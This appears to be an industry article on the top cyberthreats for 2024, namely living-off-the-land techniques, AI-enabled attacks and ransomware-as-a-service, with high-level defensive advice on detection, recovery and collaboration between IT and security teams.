In today’s fast-evolving cybersecurity environment, being aware of upcoming threats on the horizon is crucial for informing the preparations and actions that are needed to boost enterprise resilience. This is no easy task, however, as the threat landscape expands and attacks become ever more sophisticated.
In 2024, relying on traditional strategies to address new challenges will no longer be enough. To prevent intrusion and speed recovery, IT operations and security operations teams will need to share intelligence and work hand in glove. They’ll also need to know where to focus security efforts over the coming year.
With that in mind, let’s take a look at the top cyberthreats to watch out for in 2024.
Living off the Land: the rise of the invisible threat
Rather than deploying malware, today’s hackers are using tools and resources legitimatelyinstalled on operating systems to covertly carry out their activities.
Difficult to detect, these so-called Live Off the Land (LOL)-style attack techniques enable attackers to stealthily lurk in plain sight and circumvent traditional security measures. For example, attackers are targeting signed binaries (LOLBins), scripts (LOLScripts) and libraries in a bid to shield their actions and deploy malicious payloads.
By leveraging native OS utilities, attackers are able to hide their activities within normalsystem operations and bypass traditional endpoint detection and response security measuresdesigned to detect and block malware. For instance, native Windows tools such as Cmd.exec, the default command-line interpreter for Windows, are being used by attackers to execute scripts and commands and conceal persistent backdoor activities.
Difficult to detect due to their ability to seamlessly blend in, organised cyberattack groups are increasingly deploying LOL tactics to achieve their objectives. Recently it emerged that the state-sponsored Volt Typhoon group used LOL approaches to blend in with regular Windows system and network activities so it could undertake surveillance on utility companies that support US military installations.
To counter this threat, organisations will need to double down on reviewing system and network configurations; engage in enhanced logging, monitoring, and behavioural analysis activities; and introduce realistic decoys that will tempt bad actors into engaging and exposing their techniques.
The cyber AI risk gets real
The UK’s National Cyber Security Centre (NCSC) recently issued a stark warning about how AI is set to increase the volume and impact of cyberattacks. Highlighting how generative AI tools both lower the barrier for entry for less sophisticated hackers and boost their capabilities, the NCSC has urged organisations to act now to address the onslaught. Indeed, according to one recent report, cybersecurity professionals at large enterprises say they arealready witnessing a substantive increase in generative AI threats.
In addition to utilising generative AI tools like chatbots to create highly personalised online phishing campaigns or to produce keystroke malware and basic code designed to crack a specific target’s credentials and algorithms, concerns are rising that bad actors could utilise AI-driven analysis and predictive modelling to discover vulnerable assets or identify new parameters that can be exploited with minimal effort.
To address this challenge, organisations should initiate their own AI-powered defence procedures to automate the detection and remediation of non-compliant systems, undertake automated patching, and manage previously labour-intensive activities such as identity and access management.
Similarly, generative AI can be used to speedily parse through myriad logs across multiple systems and devices to more quickly identify attacks and kick-off preventive actions designed to prevent extensive damage and protect key resources and data.
By leveraging AI to achieve a more compliant and robust zero trust infrastructure and address threat alerts in real-time, organisations will be able to initiate a truly proactive defence posture.
Ransomware-as-a-service (RaaS) is set to skyrocket
Today’s hackers have established highly complex RaaS subscription and distribution models that make it easy for threat actors with limited expertise or know-how to initiate highly advanced attacks using up-to-the-minute techniques and approaches.
With RaaS providers now specialising in specific aspects of the attack process, today’swould-be-attackers can take advantage of kits that provide everything they’ll need to get up and running. These ready-made tools include payment portals and specialist support services as well as a range of ransomware variants such as LockBit, Revil, and Dharma. All of which can be brought together to create a bespoke ransomware attack.
With RaaS spawning more frequent and complex attacks, organisations will need to enhancetheir ransomware readiness. This may include enhancing their vulnerability managementcapabilities, utilising early warning detection tools, using multi-factor authentication, and automating data remediation and backup in production environments in order to recover fast in the event of a breach.
Top tips for boosting cyber resilience in 2024
As cyber criminals evolve their approaches, ensuring business continuity and cyber resilience in the coming year depends on organisations taking some key actions to ensure they are betterprepared when it comes to maintaining vigilance over their systems and recouping faster from an attack:
• As a priority, organisations should eliminate the operational silos that exist between ITOps and security teams and enable a more collaborative approach to resilience. This shared responsibility should, at a minimum, encompass segmentation, redundancy, deception, contextual awareness, and privilege restriction.
• Returning to business-as-usual operations following a cyberattack should be viewed as a top security objective and initiating robust data recovery techniques will be of primary importance.
• IT teams must frequently test recovery processes to ensure that all data can always be recovered, in a predictable way. Waiting for a real-life attack to see if recovery plans perform as expected is an inherently risky approach.
• Deploying early detection techniques will enable IT and security teams to proactively search for and prevent attacks by identifying anomalous behaviours that are an early indicator of an attack.
Cyber attacks are simply unavoidable, therefore organisations must enforce techniques which will keep their data safe from threats even with the new generation of sophisticated cybercriminals.